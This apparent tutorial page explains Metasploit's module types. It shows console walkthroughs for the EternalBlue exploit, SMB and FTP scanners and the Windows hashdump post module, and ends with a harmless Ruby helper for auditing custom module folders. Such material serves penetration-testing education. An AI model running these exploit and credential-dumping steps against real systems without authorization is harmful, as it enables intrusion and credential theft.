📦 Modules
Everything in Metasploit revolves around modules. A module is a self-contained piece of code designed to perform a specific task — whether that's exploiting a vulnerability, scanning a network, or escalating privileges on a compromised host. Understanding the different module types and how they interact is fundamental to using Metasploit effectively.
1️⃣ Module Types Overview
| Type | Path Prefix | Purpose |
|---|---|---|
| Exploit | exploit/ | Delivers a payload by exploiting a vulnerability in a target. |
| Auxiliary | auxiliary/ | Performs actions that don't involve exploitation — scanning, fuzzing, sniffing, brute-forcing. |
| Post | post/ | Runs on an already-compromised system — enumeration, privilege escalation, data exfiltration. |
| Payload | payload/ | The code that runs on the target after a successful exploit (e.g., reverse shell, Meterpreter). |
| Encoder | encoder/ | Transforms payloads to avoid bad characters or evade basic signature detection. |
| Nop | nop/ | Generates NOP (No Operation) sleds for buffer overflow exploits. |
| Evasion | evasion/ | Generates payloads specifically designed to bypass antivirus and EDR solutions. |
2️⃣ Exploit Modules
Exploit modules are the core of Metasploit. They leverage a vulnerability in a target service to deliver a payload.
Structure
Exploits are organized by platform and service:
```text
exploit/
├── windows/
│   ├── smb/
│   │   ├── ms17_010_eternalblue
│   │   └── ms08_067_netapi
│   ├── http/
│   └── local/
├── linux/
│   ├── http/
│   └── local/
├── multi/
│   ├── http/
│   └── handler/   ← The generic payload handler
└── unix/
```
Example: Using an Exploit Module
```text
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s)
   RPORT      445              yes       The target port (TCP)
   SMBDomain                   no        The Windows domain
   SMBPass                     no        The password for the username
   SMBUser                     no        The username to authenticate as

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.2
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
```
Concept
The exploit/multi/handler module is special — it's a generic listener that catches incoming connections from payloads you've delivered through other means (e.g., a manually placed executable, a phishing email, or MSFVenom-generated payload).
3️⃣ Auxiliary Modules
Auxiliary modules perform tasks that don't involve exploitation. They are your go-to for reconnaissance and information gathering within Metasploit.
Common Categories
| Category | Path | Purpose |
|---|---|---|
| Scanner | auxiliary/scanner/ | Port scanning, service detection, vulnerability checks. |
| Fuzz | auxiliary/fuzz/ | Protocol fuzzing to discover crashes and potential vulnerabilities. |
| Gather | auxiliary/gather/ | Information gathering (SNMP, DNS, HTTP). |
| Admin | auxiliary/admin/ | Administrative actions (e.g., enabling xp_cmdshell on MSSQL). |
| Server | auxiliary/server/ | Set up rogue services (DNS, DHCP, SMB) for attacks like LLMNR poisoning. |
Example: SMB Version Scanner
```text
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.0/24
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 10
msf6 auxiliary(scanner/smb/smb_version) > run
```
Example: FTP Anonymous Login Check
```text
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.0/24
msf6 auxiliary(scanner/ftp/anonymous) > run
```
4️⃣ Post-Exploitation Modules
Post modules run after you've already gained access to a target (i.e., you have an active session). They are used for:
- Enumeration — Gathering system info, installed software, network config.
- Privilege Escalation — Exploiting local vulnerabilities to gain SYSTEM/root.
- Credential Harvesting — Dumping hashes, tokens, cached credentials.
- Persistence — Installing backdoors for re-entry.
- Lateral Movement — Pivoting to other hosts on the network.
Example: Dump Windows Hashes
```text
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(windows/gather/hashdump) > run
```
Example: Enumerate Linux System Info
```text
msf6 > use post/linux/gather/enum_system
msf6 post(linux/gather/enum_system) > set SESSION 2
msf6 post(linux/gather/enum_system) > run
```
Tip
Post modules always require a SESSION option — the ID of an active Meterpreter or shell session. Use sessions -l to list your active sessions.
5️⃣ Listing and Exploring Modules
```text
# Show all modules of a specific type
show exploits
show auxiliary
show post
show payloads
show encoders
show nops
show evasion
# Count exploit module files on disk (a system shell command, one file per module)
find /usr/share/metasploit-framework/modules/exploits -type f -name '*.rb' | wc -l
# Get detailed info about a loaded module
info
# Show advanced options (hidden by default)
show advanced
# Show evasion options (for compatible modules)
show evasion
```
6️⃣ Module Locations
Metasploit modules are stored in two locations:
| Location | Purpose |
|---|---|
| /usr/share/metasploit-framework/modules/ | Built-in modules shipped with Metasploit. |
| ~/.msf4/modules/ | Custom modules you've written or imported. |
Note
Never modify files in /usr/share/metasploit-framework/ directly — updates will overwrite your changes. Always place custom or modified modules in ~/.msf4/modules/, mirroring the same directory structure.
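Mirroring the directory structure has one catch: the prefix typed after `use` is singular (`exploit/`), while several type directories on disk are plural (`modules/exploits/`, as in the path used earlier on this page). The Ruby below is an added example, not Metasploit's own code; `TYPE_DIRS`, `module_path` and `audit_custom_modules` are hypothetical names, the directory mapping is stated from Metasploit's on-disk layout, and the sample tree is constructed.

```ruby
require 'tmpdir'
require 'fileutils'

# Prefix typed after `use` => type directory on disk (several are plural).
TYPE_DIRS = {
  'exploit' => 'exploits', 'auxiliary' => 'auxiliary', 'post' => 'post',
  'payload' => 'payloads', 'encoder' => 'encoders', 'nop' => 'nops',
  'evasion' => 'evasion'
}.freeze

# File backing a module name under a modules root (payloads excluded: their
# names are assembled from singles/stagers/stages, not from one file).
def module_path(root, full_name)
  type, rest = full_name.split('/', 2)
  dir = TYPE_DIRS.fetch(type) { raise ArgumentError, "unknown type: #{type}" }
  raise ArgumentError, 'payload names do not map to one file' if type == 'payload'
  raise ArgumentError, 'missing module name' if rest.to_s.empty?
  File.join(root, dir, "#{rest}.rb")
end

# Sort each .rb file under a custom root: usable names, payload files, misplaced.
def audit_custom_modules(root)
  by_dir = TYPE_DIRS.invert
  report = { names: [], payload_files: [], misplaced: [] }
  Dir.glob('**/*.rb', base: root).sort.each do |rel|
    top, rest = rel.split('/', 2)
    type = rest && by_dir[top]
    if type.nil?
      report[:misplaced] << rel
    elsif type == 'payload'
      report[:payload_files] << rel
    else
      report[:names] << "#{type}/#{rest.delete_suffix('.rb')}"
    end
  end
  report
end

# Constructed tree: correct placement, a payload file, a singular-prefix typo.
def demo
  files = %w[exploits/windows/smb/my_fix.rb payloads/singles/cmd/unix/custom.rb
             exploit/windows/smb/typo.rb]
  Dir.mktmpdir do |root|
    files.each do |rel|
      FileUtils.mkdir_p(File.join(root, File.dirname(rel)))
      File.write(File.join(root, rel), "# placeholder\n")
    end
    audit_custom_modules(root)
  end
end

p demo if __FILE__ == $PROGRAM_NAME
```

Pointing `audit_custom_modules` at `~/.msf4/modules` (expanded with `File.expand_path`) lists anything saved outside a recognised type directory under `misplaced`.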
7️⃣ Gotchas
Note
Module compatibility: Not every exploit works with every payload. Use show payloads after selecting an exploit to see only the compatible payloads. Attempting to use an incompatible payload will result in errors.
Note
Exploit reliability: Just because an exploit exists for a CVE doesn't mean it will work reliably. Check the module's Rank, read the info description, and test in a lab environment first.
Note
exploit/multi/handler is not an exploit in the traditional sense. It's a listener. You use it when your payload has already been delivered to the target through other means (MSFVenom, social engineering, file upload, etc.).
Warning
Always verify module descriptions and target information before running an exploit. Some exploits can crash services or cause data loss on the target system.